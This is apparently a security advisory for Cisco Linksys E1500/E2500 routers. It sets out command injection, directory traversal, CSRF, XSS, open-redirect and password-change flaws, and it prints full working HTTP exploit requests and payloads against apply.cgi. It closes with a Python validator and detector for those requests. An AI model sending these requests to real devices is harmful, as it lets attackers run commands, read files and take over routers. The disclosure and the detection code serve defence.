Published: 2013-02-06
Updated: 2013-02-19
Affected systems:
Cisco Linksys E1500 1.0.05 - build 1
Cisco Linksys E1500 1.0.04 - build 2
Cisco Linksys E1500 1.0.00 - build 9
Cisco Linksys E2500 1.0.03
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57760
The Cisco Linksys E1500/E2500 are Wireless-N routers using SpeedBoost technology.
The Linksys E1500/E2500 implementation contains an OS command injection vulnerability, a security bypass vulnerability, a cross-site request forgery vulnerability, a cross-site scripting vulnerability, a directory traversal vulnerability and a URI redirection vulnerability. An attacker can exploit these to execute arbitrary commands, conduct phishing attacks, bypass security restrictions, steal cookies, read system and other configuration files, and perform unauthorized actions in the context of a user's session.
1. OS command injection.
Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26
This vulnerability results from missing input validation of the ping_size parameter.
2. Directory traversal.
Parameter: next_page
3. The password can be changed without supplying the current password.
4. CSRF: the password can be changed without knowing the current one, and the attacker can enable remote management.
5. Reflected cross-site scripting.
Parameter: wait_time=3'%3balert('pwnd')//
6. Redirection vulnerability.
Parameter: submit_button=http://www.pwnd.pwnd%0a
<*Source: Michael Messner (michae.messner@integralis.com)
Link:
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following programs (methods) may be offensive in nature and are provided solely for security research and teaching. Users bear the risk themselves!
Michael Messner (michae.messner@integralis.com) provided the following test method:
============ Vulnerability Overview: ============
OS Command Injection / E1500 and E2500 v1.0.03
=> Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26
The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.
Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Connection: close
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=
Changing the request method from HTTP POST to HTTP GET makes the exploitation easier:
?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=
Directory traversal - tested on E1500:
=> parameter: next_page
Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.
Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version
Response:
HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 00:00:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close
Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012
For changing the current password there is no request for the current password - tested on E1500
With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
Example Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 311
submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500:
<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
Reflected Cross Site Scripting - tested on E1500
=> Parameter: wait_time=3'%3balert('pwnd')//
Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.
Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0
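The missing server-side validation behind the ping_size, next_page, wait_time and submit_button findings above, and the password-change plus remote-management combination of the CSRF finding, modelled as one checker that runs over raw apply.cgi request bodies and so also serves as a detector for captured traffic. This is an added example, not Linksys firmware code or the advisory author's; the allow-list rules (digits only, bare page names) are the editor's assumptions about legitimate requests, and the sample bodies are trimmed from the advisory's own requests plus one constructed benign request.

```python
import re
from urllib.parse import parse_qs

# Expected shape of each parameter the advisory names. Constructed allow-list:
# an assumption about what legitimate firmware requests look like, not a
# Linksys specification.
RULES = {
    "ping_size": re.compile(r"\d+"),                # packet size: integer only
    "ping_times": re.compile(r"\d+"),
    "wait_time": re.compile(r"\d+"),                # value is echoed into a script block
    "next_page": re.compile(r"[A-Za-z0-9_.-]*"),    # bare page name, no '/' allowed
    "submit_button": re.compile(r"[A-Za-z0-9_]*"),  # page token, never a URL
}

def check_body(body: str) -> list:
    """Return [(param, decoded_value, reason)] for each violating parameter.
    parse_qs decodes %26 / %2e / %3b / %0a first, so the rules see the real value.
    """
    findings = []
    params = parse_qs(body, keep_blank_values=True)
    for name, rule in RULES.items():
        for value in params.get(name, []):
            if not rule.fullmatch(value):
                findings.append((name, value, "unexpected characters"))
            elif name == "next_page" and ".." in value:
                findings.append((name, value, "path traversal"))
    # A password change combined with enabling WAN-side management is the
    # CSRF chain described in the advisory; alert on it in log review.
    if params.get("PasswdModify") == ["1"] and params.get("remote_management") == ["1"]:
        findings.append(("PasswdModify", "1", "password change enabling remote management"))
    return findings

# Sample bodies trimmed from the advisory's requests, plus one constructed benign request.
SAMPLES = {
    "command_injection": "submit_button=Diagnostics&submit_type=start_ping&ping_ip=1.1.1.1"
                         "&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5",
    "traversal": "submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version",
    "xss": "submit_button=Wireless_Basic&action=Apply&wait_time=3'%3balert('pwnd')//&ssid_24g=Cisco",
    "redirect": "submit_button=http://www.pwnd.pwnd%0a&change_action=gozila_cgi",
    "csrf": "submit_button=Management&action=Apply&PasswdModify=1&wait_time=4"
            "&http_passwd=password1&http_passwdConfirm=password1&remote_management=1&http_wanport=8080",
    "benign": "submit_button=Diagnostics&submit_type=start_ping&ping_ip=1.1.1.1&ping_size=32&ping_times=5",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:18} {check_body(body) or 'clean'}")
```

The same rules, applied before apply.cgi acts on a request, would have rejected every payload in the advisory while letting the benign diagnostics request through.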